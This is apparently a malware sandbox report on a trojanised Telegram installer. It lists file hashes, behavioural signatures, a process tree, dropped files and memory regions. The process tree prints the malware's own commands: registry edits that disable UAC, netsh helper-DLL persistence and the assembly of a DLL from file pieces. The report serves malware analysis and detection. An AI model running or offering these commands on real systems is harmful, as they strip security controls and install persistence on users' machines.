Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    122s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    02/08/2024, 14:54 UTC

General

  • Target

    win_X64-telegram-TG-zwb5.09.exe

  • Size

    106.0MB

  • MD5

    7e5e997bacfd13d0e4334d3633a5a0c7

  • SHA1

    5c00469208e2bf98d467ea18c50cbf1b59a8da8b

  • SHA256

    1a6b8de03d8197a402c830f55e61b8a0a8912d56c458a6a6096029ccc0b2fb29

  • SHA512

    0670220677d34d656b1055dff92ca44234e1e75e434dab9b4c55ced36dcda4da76e9023cecda2bbc2aa32dca2b7f4c50e1df8910cc9e56f2e2d9ffd164d14658

  • SSDEEP

    1572864:jIVwGw8QkX/YZhf6a/XXe8MUQE3nsMHHiUyRLelUyRLelUyRLelUyRLelUyRLelo:jIVwGwOXgrf68X4UhsXj

Malware Config

Signatures

  • UAC bypass 3 TTPs 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 17 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\win_X64-telegram-TG-zwb5.09.exe
    "C:\Users\Admin\AppData\Local\Temp\win_X64-telegram-TG-zwb5.09.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2880
    • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
      "C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5626914 "__IRAFN:C:\Users\Admin\AppData\Local\Temp\win_X64-telegram-TG-zwb5.09.exe" "__IRCT:1" "__IRTSS:0" "__IRSID:S-1-5-21-940600906-3464502421-4240639183-1000"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2844
      • C:\Users\Admin\AppData\Roaming\TG-CNS\telegram\tdata\emoji\Mari.exe
        "C:\Users\Admin\AppData\Roaming\TG-CNS\telegram\tdata\emoji\Mari.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1928
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ipconfig /all
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2064
          • C:\Windows\system32\ipconfig.exe
            ipconfig /all
            5⤵
            • Gathers network information
            PID:2448
        • C:\Windows\System32\netsh.exe
          "C:\Windows\System32\netsh.exe" -f C:\Users\Public\Pictures\hP2M9.xml
          4⤵
          • Event Triggered Execution: Netsh Helper DLL
          PID:1756
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\M6X6o.bat"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:620
          • C:\Windows\system32\reg.exe
            reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F
            5⤵
            • UAC bypass
            PID:2468
          • C:\Windows\system32\reg.exe
            reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F
            5⤵
            • UAC bypass
            PID:1532
          • C:\Windows\system32\reg.exe
            reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F
            5⤵
            • UAC bypass
            PID:2540
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c copy /b C:\Users\Public\Pictures\V20vK\25oi2~i\p+C:\Users\Public\Pictures\V20vK\25oi2~i\w C:\Users\Public\Pictures\V20vK\25oi2~i\xlstat4.dll
          4⤵
            PID:2376
    • C:\Windows\system32\mmc.exe
      C:\Windows\system32\mmc.exe -Embedding
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2056
      • C:\Users\Public\Pictures\V20vK\25oi2~i\XmpLiveUD.exe
        "C:\Users\Public\Pictures\V20vK\25oi2~i\XmpLiveUD.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Writes to the Master Boot Record (MBR)
        • System Location Discovery: System Language Discovery
        PID:2316

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\IRIMG1.JPG

      Filesize

      107KB

      MD5

      81a7a4f9e9cf23b18a5830cd8820fa73

      SHA1

      509f342811540edff486945380755557349d60db

      SHA256

      7e32d7c8c0d36644016fc48294a721ef5bb56277aa45c79016fbe28d9256f075

      SHA512

      40ab0c46ba91062cc723f38d90fc44dcd6f173524ef4c60eb71cd6496556cd8913b3737a338fe7de3ce29b7e9fd7558723eb3bd209123f502b2e48f8b36cb630

    • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\IRIMG3.JPG

      Filesize

      87KB

      MD5

      a7db741aeb82ca0510d681271a09c90a

      SHA1

      583a8f2c8af8e2d802da8921d8a3009000f9531e

      SHA256

      e82ba7cb345dc28ffa8b1f662e58bb3266690f39948617e0d42109a752adff2a

      SHA512

      ee9f1275fd5247d658f228eb7c0d318e9210ac261a877ef47304d71ca401f342426b2f260ee4cc8212f849a93cd87e8e25e9d7b2278b9fb9a0e3a2836d7b0d06

    • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

      Filesize

      4.9MB

      MD5

      b0a1f1e0a106e1a62753c8a07fb3809b

      SHA1

      b4bab82aa173a401a2f16f8b4ad91105a895b2d9

      SHA256

      f7e07f7936269756bb73e91c8b280c2ab8532fb5bf15085d96eaebc7a05a8950

      SHA512

      ffc97976471e26e938e0389b33c0143b4a55653f90ee35f8220663b2a78fc48a106a204dd25c990817a57f3670d41fd1361cbdbc3bc4894ded882b356649c083

    • C:\Users\Admin\AppData\Roaming\M6X6o.bat

      Filesize

      392B

      MD5

      30d6eb22d6aeec10347239b17b023bf4

      SHA1

      e2a6f86d66c699f6e0ff1ac4e140af4a2a4637d1

      SHA256

      659df6b190a0b92fc34e3a4457b4a8d11a26a4caf55de64dfe79eb1276181f08

      SHA512

      500872c3f2f3f801ec51717690873194675cb7f32cc4a862c09d90c18638d364d49b0e04c32323f52734e5c806e3503a63ac755c7019d762786a72840123df76

    • C:\Users\Admin\AppData\Roaming\TG-CNS\Uninstall\IRIMG2.JPG

      Filesize

      86KB

      MD5

      81f3c5901a89416940bf84f61c011e96

      SHA1

      2d2561a4843d0a9eaa100e05ff41ed4616a8692f

      SHA256

      8a29ff35ce664ee5e87218191efc0e2b39a4d7e0e278c192a9690e69776799c8

      SHA512

      4b31078c87985770852cd2941e8d965376418f4da25b9d6b02291da089ff71cdee0920fef25c70a2470583766ddd7164bf2b578bc1c6e76954b478cddebf6f7b

    • C:\Users\Admin\AppData\Roaming\TG-CNS\Uninstall\uninstall.xml

      Filesize

      9KB

      MD5

      9c8cd23a158b385cc4b4609004936fd7

      SHA1

      b82e423af18f256971538c2f02e0f9b9f9067686

      SHA256

      a4788678f795672138d625e5676605925ac098033f0c5f495c549524e4814105

      SHA512

      909f0a990f64f71144fafa918ebe0a8f3ecf46176bcf2d564069bb99811f6dfd520d0a20a7faa0e6fac19c88494a31c1e09852e59d1272af2cefe04f8060fb22

    • C:\Users\Admin\AppData\Roaming\TG-CNS\Uninstall\uninstall.xml

      Filesize

      15KB

      MD5

      edc29bff723fbccfe969b4b58f333eb1

      SHA1

      a0bec28b1a66cf188efb428593b8a779c872c3f7

      SHA256

      9cdfee326128783944a95754e496481e06528c49c065e254b6a3bd4115a1a7e4

      SHA512

      14c9bb8589c2693d85f4ffedc5ab2d8dde822e1afa2b5124c11deceb46faac67d4b2f28bacc2b36165fa3a64da1a11e1047267dc1e826e95df3057985e9e8b97

    • C:\Users\Admin\AppData\Roaming\TG-CNS\telegram\Updater.exe

      Filesize

      172KB

      MD5

      f3f4dde837f9b92abb5dd9fd5d3174e3

      SHA1

      66d3b76b564b577c2392c45ca7f84cc62c037318

      SHA256

      be44239c288ee40899b9ba92edeb64141ee9522c377094298c853d07fb6295cd

      SHA512

      45a741eb7d4ee7430907b9b8a03e91c5d0d64f3b32c54f6c808bad7c92826eeb4180a28339f2df8a1cd1eaf4ac613a30972ccf39593536147b940ee1e1cc5834

    • C:\Users\Admin\AppData\Roaming\TG-CNS\telegram\tdata\emoji\cache_18_7

      Filesize

      648KB

      MD5

      8bae1c34285e15fae092ef5afb4bdb9a

      SHA1

      ce7098ffafa1a0150de43e390f4489bd0a35bfd1

      SHA256

      48d4c29de7c7e13c65856da6963a20f41f9001dab80bb72b68d61cab7fee1d33

      SHA512

      927581328052659a0e65df5499b5e16624145ff61512255c64770194384d7ea5b469c3b1301e63146de7b5fc01bf6acf6e81e567806cdfed3a4b306b98e18ca4

    • C:\Users\Admin\AppData\Roaming\TG-CNS\telegram\tdata\emoji\cache_22_1

      Filesize

      9.0MB

      MD5

      be5628882d28ba1bdb9850dc4b7e7fa1

      SHA1

      6d37839c4b8ded05c0e8108696e1b794de59a2a8

      SHA256

      def949e97a2a2d2e504f7c85a27a6f2fd44d3a898357398f4aaa7eb033dfb287

      SHA512

      16037fd6ee2bb26e1014e9e69a2ee5d7290ebe5021ed1eedaa5908b73c39cc2ba6f66c553be9a39163b8831e8f519b10009e71fb94ce392c7229541192aa1c39

    • C:\Users\Public\Pictures\V20vK\25oi2~i\LIBEAY32.dll

      Filesize

      1.4MB

      MD5

      ff5c63efbba91a0eec9fc645da655b4c

      SHA1

      d225ceff3601b57add69df7d854b2348a8980255

      SHA256

      e1fbb97ff3607d569d584f78ce77a9dd2cf64dca05aebdbf3e55c9711e07b3be

      SHA512

      96b963823d7a28e4d4ecd703aa26ad3d3e1d4086e09a4cc08ca88c30c9b8ceb42b7daf184e33b9175f87a566e78028cca3e6ab90ed6537598677f27b15eefce5

    • C:\Users\Public\Pictures\V20vK\25oi2~i\NH.txt

      Filesize

      179KB

      MD5

      525e7322fba8241956dad96e7002f33c

      SHA1

      e1afb270a65ab2383c89ee86bfa0715bfb6f0dc9

      SHA256

      e466c05616476d214ca7caef8020a046277e37e340a3470ffcf228ac967ac7c9

      SHA512

      cd609d4ab4319259dff3d92de045f0a9464bd4ecd72bc8e098e279ecdb954b41841f8650f3ab085dca980ac563ab2e4918d2f881d90448f3b7dce74a51ffdcad

    • C:\Users\Public\Pictures\V20vK\25oi2~i\XmpLiveUD.exe

      Filesize

      4.8MB

      MD5

      5fccddc84705ef583e1e105a706a4cea

      SHA1

      fd62980ab42f9062cb2cae7fb432169a660a9391

      SHA256

      b09997d6da86ae913039327a1ca291a405d741722be660046db75e9b76b3176c

      SHA512

      b9a690bf3c01e4e111c1139fac883265d8b97c96d9d6ae2bb4e9c303a622ab2c67b6acd058534f7afb14d9d2f0aa48eefea83d73ebaa7b972ff3c75c0723c4ac

    • C:\Users\Public\Pictures\V20vK\25oi2~i\p

      Filesize

      883KB

      MD5

      8c91824393f6c13ad31925d70a3746fc

      SHA1

      a596499fdf8fc7e047227a9fcfb0ff0728cf940c

      SHA256

      47d889023b791f815b87c139c039eb7270c81dd881b34e894cfc7e49d2823192

      SHA512

      66987ae6131b9dee7f129954415f3cfa3fc56f659853d33b2413c8e886e77d62b438fe12a89948825623f80494da86836e0844f11581c6ef10bfaae1401610d3

    • C:\Users\Public\Pictures\V20vK\25oi2~i\w

      Filesize

      883KB

      MD5

      87d78b3b8c40976b34047cbcdc0e1454

      SHA1

      3f53f3a1e52c80cdd6f5eac7216b3c1816948516

      SHA256

      4240fd9b105b4456fa428baa2e9b48a9ab2bc2736c7c33efaf92092ca45be88a

      SHA512

      4d8be70e5b958029143669b8e72fce4c1da32ef66fea9548501de62462f1d37cec2fdcb1466bf5666f2268843b7e07bf5fda6ec4441cf61cef09324594410043

    • \Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dll

      Filesize

      350KB

      MD5

      c916c7815286c5233a49deac81f8543e

      SHA1

      cb964c3c8eae8e7ce170f3ad3a55993f7a1918db

      SHA256

      3d07466b8f5c18afc70c6a9746d43fa7daa39c9bd41e8bfb928c70e7d7458bf4

      SHA512

      0d65283c41c30ee688bf02ec3eec7f6b17a750efc18fa6a66f26c7c6ef8bae860d270b31017f096d8d254c2769be2b7ed64d6b3dc659d1b57d466388271e2c78

    • \Users\Admin\AppData\Roaming\TG-CNS\telegram\tdata\emoji\Mari.exe

      Filesize

      14.5MB

      MD5

      f6c56945b2a627dfebec3b2f80544855

      SHA1

      21eb4d3ea7fa50fc291c6a542437bfb6d834476d

      SHA256

      b4e3976adfb46ac2c1e3f8731b7e49976baf7538ac5d50a85633f3cdfbcb38b0

      SHA512

      0937b528fa8d46d52a683a5ab2ab490b81ef7c03553e62eabd0a02bf7612049f38ba0ac8b27f0b00909a266a366f7d235e2a3289860e38c8d10f2b67d0b789b9

    • \Users\Public\Pictures\V20vK\25oi2~i\XLLiveUpdateAgent.dll

      Filesize

      935KB

      MD5

      95510f67cf120d180362fd2d3ec23d9c

      SHA1

      4787cfb2398fd3285be85e52be633f454bb48ff6

      SHA256

      9f64fdbf96b10a185c51bf9e7d6199e44a5ef3255de40a0a447cf556ac7675f0

      SHA512

      4caf48792686a89e8397813a6b0246b274986e7fdf245d0b1aa3e36b7e9de0be7b618cd483871f76769a569a7b896f5b9f461f62f4d26cedbf257cc74c69f562

    • \Users\Public\Pictures\V20vK\25oi2~i\libcurl.dll

      Filesize

      706KB

      MD5

      4b5dfd7e9ac50a741b5ac6102b30cbf5

      SHA1

      c3ae8f11f12b2160055a28ee8cd0f14d215864dc

      SHA256

      8fbb6e1c42d6ea9fb1f5651d0cad370cbd36fda89035568c460193b1ae316cdc

      SHA512

      9099874416956b53bb7a8d63a215f0e40ae806d21bdad6fcdba002f35c5b3d8827c7d5e5c9500a356a7bdf7a3d402c3d8851dd0df69a72fed752277f32b210cc

    • \Users\Public\Pictures\V20vK\25oi2~i\libexpat.dll

      Filesize

      379KB

      MD5

      0cdb376595b90c8e40169a7332c609cc

      SHA1

      0e47e06237f27388437d8631d055e78a34b37e03

      SHA256

      31d2076066107bd04ab24ff7bbdf8271aa16dd1d04e70bd9cc492e9aa1e6c82b

      SHA512

      3062a64d412d69996d36caf7acf1dd040941ab9adf26841fcb103d4711ffcb8e3a8deaa9374042c882e1e4c3ad51e4d294498c398d2b6adf0f1c6669d6f1d94b

    • \Users\Public\Pictures\V20vK\25oi2~i\ssleay32.dll

      Filesize

      371KB

      MD5

      7456818a22dad2c0965580d8bbf4cabd

      SHA1

      548714607df2ec3b7c8a22cfba3a1776e6e80861

      SHA256

      f3a288c5455b074fe9c9d5a160adeb49e84bbe1832b5fcbe8f26093215192f65

      SHA512

      13f6589bd9c0c60a3df63325c57e94129761adc558d1a65eb4c6e138e6155dd9dbe501d45edde282219dc357593458f5f84a29188d123dcb7770e7479f6a7e68

    • \Users\Public\Pictures\V20vK\25oi2~i\xlstat4.dll

      Filesize

      1.7MB

      MD5

      f5e75394913d746ac50a5d8af30a67b8

      SHA1

      488f9c69740b826b3aaf5c2626eef8d5e107ab01

      SHA256

      c5f367bfe533e0f5a221c01da922ef182a49a326c92aa1d409dc7e2d7dcbedc1

      SHA512

      2734e2f63a115d9699108ae07dd4bcbdc21f503333f3954679b60184736a29220b58dc0b0e220fd7659d9c3b818481108a0d22ed24f7810e7c2daf36fa92d5ef

    • memory/1928-202-0x0000000180000000-0x000000018077E000-memory.dmp

      Filesize

      7.5MB

    • memory/1928-204-0x0000000180000000-0x000000018077E000-memory.dmp

      Filesize

      7.5MB

    • memory/1928-203-0x0000000180000000-0x000000018077E000-memory.dmp

      Filesize

      7.5MB

    • memory/2316-246-0x0000000000A20000-0x0000000000A89000-memory.dmp

      Filesize

      420KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.